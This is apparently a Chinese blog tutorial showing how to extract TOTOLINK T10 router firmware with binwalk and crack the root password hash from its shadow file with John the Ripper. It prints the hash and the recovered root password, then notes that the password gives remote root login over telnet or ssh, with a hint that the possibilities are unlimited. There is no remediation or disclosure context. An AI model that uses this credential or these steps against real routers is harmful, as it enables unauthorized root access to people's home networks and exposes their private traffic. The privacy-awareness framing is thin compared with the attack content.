大家好，我是明说网络的小明同学。今天和大家简单聊聊物联网安全里面的设备root密码爆破。

---

随着互联网、IPv6、5G等技术的发展，促进了物联网的崛起。

物联网设备作为社会空间和互联网空间的桥梁，在日常生活中发挥了极其重要的角色。

家庭路由器作为用户连接互联网的最后一跳路由设备，其安全关乎用户的隐私。了解我们所使用的设备的安全风险，有利于保护我们的个人隐私。

今天，结合TOTOLINK这一款路由器的弱登录密码进行一次物联网安全实战讲解。

目标：TOTOLINK T10

我们今天的目标是TOTOLINK T10这一款路由器，相关的信息可以参考如下链接

http://www.totolink.cn/home/menu/newstpl.html?menu_newstpl=products&id=15www.totolink.cn/home/menu/newstpl.html?menu_newstpl=products&id=15

固件下载

路由器固件包含嵌入式设备正常运行所需要的代码、数据等，通常存储在flash中。提取物联网固件拥有很多种方式（关注我，发送提取固件，获取完整PPT）：

今天我们使用直接官网下载的方式。

通过在其官网搜索，发现其提供了路由器的固件。

TOTOLINK全球领先的无线路由器,无线中继器研发制造厂商​www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=15&ids=36

将固件下载下来之后，使用binwalk 进行解压

binwalk -Me TOTOLINK_CS185R_T10_IP04336_8197F_SPI_16M64M_V5.9c.1485_B20180122_ALL.web

解压后，我们可以发现squashfs文件系统

在/etc/shadow.sample中可以发现密码文件

root:$1$BJXeRIOB$w1dFteNXpGDcSSWBMGsl2/:16090:0:99999:7:::nobody:*:14495:0:99999:7:::

John密码爆破

密码文件中的` $1$BJXeRIOB$w1dFteNXpGDcSSWBMGsl2/ ` 为linux 中密码存储的格式，可以看出密码已经进行了加密。

这里，我们使用John the Ripper这个工具对上述密码进行爆破。

mac上john的安装方法：brew install john

John的使用方法

John the Ripper password cracker, version 1.9.0Copyright (c) 1996-2019 by Solar DesignerHomepage: http://www.openwall.com/john/Usage: john [OPTIONS] [PASSWORD-FILES]--single                   "single crack" mode--wordlist=FILE --stdin    wordlist mode, read words from FILE or stdin--rules                    enable word mangling rules for wordlist mode--incremental[=MODE]       "incremental" mode [using section MODE]--external=MODE            external mode or word filter--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]--restore[=NAME]           restore an interrupted session [called NAME]--session=NAME             give a new session the NAME--status[=NAME]            print status of a session [called NAME]--make-charset=FILE        make a charset, FILE will be overwritten--show                     show cracked passwords--test[=TIME]              run tests and benchmarks for TIME seconds each--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only--groups=[-]GID[,..]       load users [not] of this (these) group(s) only--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only--salts=[-]N               load salts with[out] at least N passwords only--save-memory=LEVEL        enable memory saving, at LEVEL 1..3--node=MIN[-MAX]/TOTAL     this node's number range out of TOTAL count--fork=N                   fork N processes--format=NAME              force hash type NAME: descrypt/bsdicrypt/md5crypt/                           bcrypt/LM/AFS/tripcode/dummy

我们使用john shadow.sample进行爆破，过程如下所示：

可以看出，该密码是以MD5 哈希(md5crypt)的方式存储，爆破的结果为：

root用户的登录密码是cs2012。

有什么用？

telnet ssh等，以root权限远程登录设备。剩下的，想象有多大，可能就有多大。